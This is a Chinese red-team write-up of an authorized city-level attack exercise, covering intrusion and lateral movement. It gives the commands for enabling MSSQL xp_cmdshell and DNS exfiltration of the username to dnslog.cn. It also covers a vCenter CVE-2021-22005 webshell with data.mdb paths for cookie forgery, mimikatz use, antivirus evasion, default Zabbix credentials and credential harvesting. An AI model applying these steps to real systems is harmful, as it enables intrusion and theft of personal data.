本文章是某市级HW的复盘总结，主要分享内网的一些打法以及思路，文中内容已做脱敏处理。文章所发的工具均来自互联网收集，请勿使用于非法测试。

文中部分工具请关注微信公众号“极致攻防实验室”回复关键字获取。

外网打点

年轻人不必讲武德，上来就是信息收集组合拳，域名收集+端口扫描+指纹识别。运气很好，发现了很多资产，有泛微、用友，先使用OA漏洞工具扫一遍，无果。再手动测试最新的漏洞POC，可惜，一个洞都没有。既然手上没有day，那就老老实实做一个安服仔渗透测试吧。

OA漏洞扫描工具：关注公众号，后台回复"oascanner"获取。

历经一个上午，终于，发现一处后台登录的sql注入，直接一个单引号就抛出异常，双单引号即可闭合。推荐一个sql注入的burp插件（xia_sql），自动对所有参数添加单引号判断是否存在异常。

接下来直接将数据包丢到sqlmap自动化测试，成功跑出了payload，支持堆叠注入，且数据库类型是MSSQL。

那事情就好办了（直接一个笑脸）。这里我是一步步激活xp_cmdshell，当然可以直接sqlmap --os-shell

;execute('sp_configure "show advanced options",1')  # 将该选项的值设置为1;execute('reconfigure')                             # 保存设置;execute('sp_configure "xp_cmdshell", 1')           # 将xp_cmdshell的值设置为1;execute('reconfigure')                             # 保存设置;execute('sp_configure')                            # 查看配置;execute('xp_cmdshell "whoami"')                    # 执行系统命令

成功激活xp_cmdshell，可执行系统命令，执行ping命令

收到dns请求，Windows操作系统dns带外可以使用%USERNAME%.dnslog.cn

完美，上个CS玩玩。顺便做个权限维持。

内网横向

信息收集

被动收集

1、判断是否处于域环境

net time /domain

显然， 并不属于域内。

2、判断所属的网络环境，收集能通哪些网段

(1)查看hosts文件：C:WindowsSystem32driversetchosts，是否有域名绑定。

(2)查看网络连接：netstat -ano

(3)查看路由：route print

(4)翻文件：C:UsersAdministratorDesktop，C:UsersAdministratorDownloads，等路径

(5)脱浏览器访问记录以及保存的账号密码

脱浏览器信息工具：关注公众号，后台回复"browser"获取

主动收集

所谓主动收集，即主动发包，主动探测。这里主要依靠工具实现

（1）netspy：深信服深蓝实验室天威战队强力驱动，支持多种协议探测模式。

netspy工具：关注公众号，后台回复关键字"netspy"获取

（2）kscan：具备端口扫描、协议检测、指纹识别，暴力破解等功能，这里使用它的网段探测功能。

kscan工具：关注公众号，后台回复关键字"kscan"获取

内网成果

为避免被发现，扫描工具fscan稍微做个免杀，先探测入口点的C段，并只探测80,443端口，不扫描poc，且线程调至30

集权系统

Vcenter

获取vcenter版本，路径/sdk/vimServiceVersions.xml

直接试试CVE-2021-22005，上传cmd webshell

后续选择上传哥斯拉webshell，哥斯拉支持大文件下载。下载data.mdb文件，伪造cookie进入vcenter后台

mdb文件路径：

Linux：/storage/db/vmware-vmdir/data.mdbWindows：C:ProgramDataVMwarevCenterServerdatavmdirddata.mdb

使用脚本vcenter_saml_login伪造cookie，替换浏览器的cookie，进入后台

虚拟机数量真不少，发现一台未锁屏机器，于是先对这台机器做权限维持。

后面进行vcenter的后利用了，通过克隆虚拟机-->以自定义的PE启动系统-->运行mimikatz读取hash或明文密码。使用密码或者hash做碰撞。

若有域控，域控机器有可能通过vcenter管控，本次未发现域控。

Zabbix

默认口令 Admin/zabbix

这个版本的zabbix不能通过后台的脚本功能执行命令。

内网横下几台机器后，做好权限维持，晚上偷偷搞内网了。

其他成果

密码碰撞，只进行3389，也可以进行445端口的SMB碰撞

每拿下一台windows机器，都查看下远程桌面连接记录，Xshell、secureCRT、PuTTY、MobaXterm等ssh管理工具，navicat数据库连接工具，因为往往会有保存密码的习惯。

用友NC，老版本，可进行文件上传，可存在BshServlet命令执行，直接上传webshell

找数据库配置文件，路径/ierp/bin/prop.xml，密码是加密的，解密获取明文密码。数据库类型一般是oracle

扫描发现了很多弱口令，SSH、MySQL、Oracle、Redis、Mongo等，类似于Oracle这种关系型数据库，可以通过调用存储过程执行系统，推荐工具MDUT，一键激活组件执行系统命令

提权

MDUT工具：关注公众号，后台回复关键字"mdut"获取

SSH弱口令基本是设备

连上每一个数据库，都翻看是否存在敏感信息，按现在HW规则，数据分尤为重要。

200W公民敏感数据，够吃一顿的了。

再加上一些后台的弱口令，nacos等

按照得分规则，将每一项得分点打满则点到为止。找了几个段没找到域控，安服仔打DC的梦再次破碎......

总结

1、集权系统未做好网络隔离，内网存在大量弱口令，服务器账号密码复用。

2、服务器不安装杀毒软件或者终端管控EDR。

原文始发于微信公众号（极致攻防实验室）：某市级HW复盘总结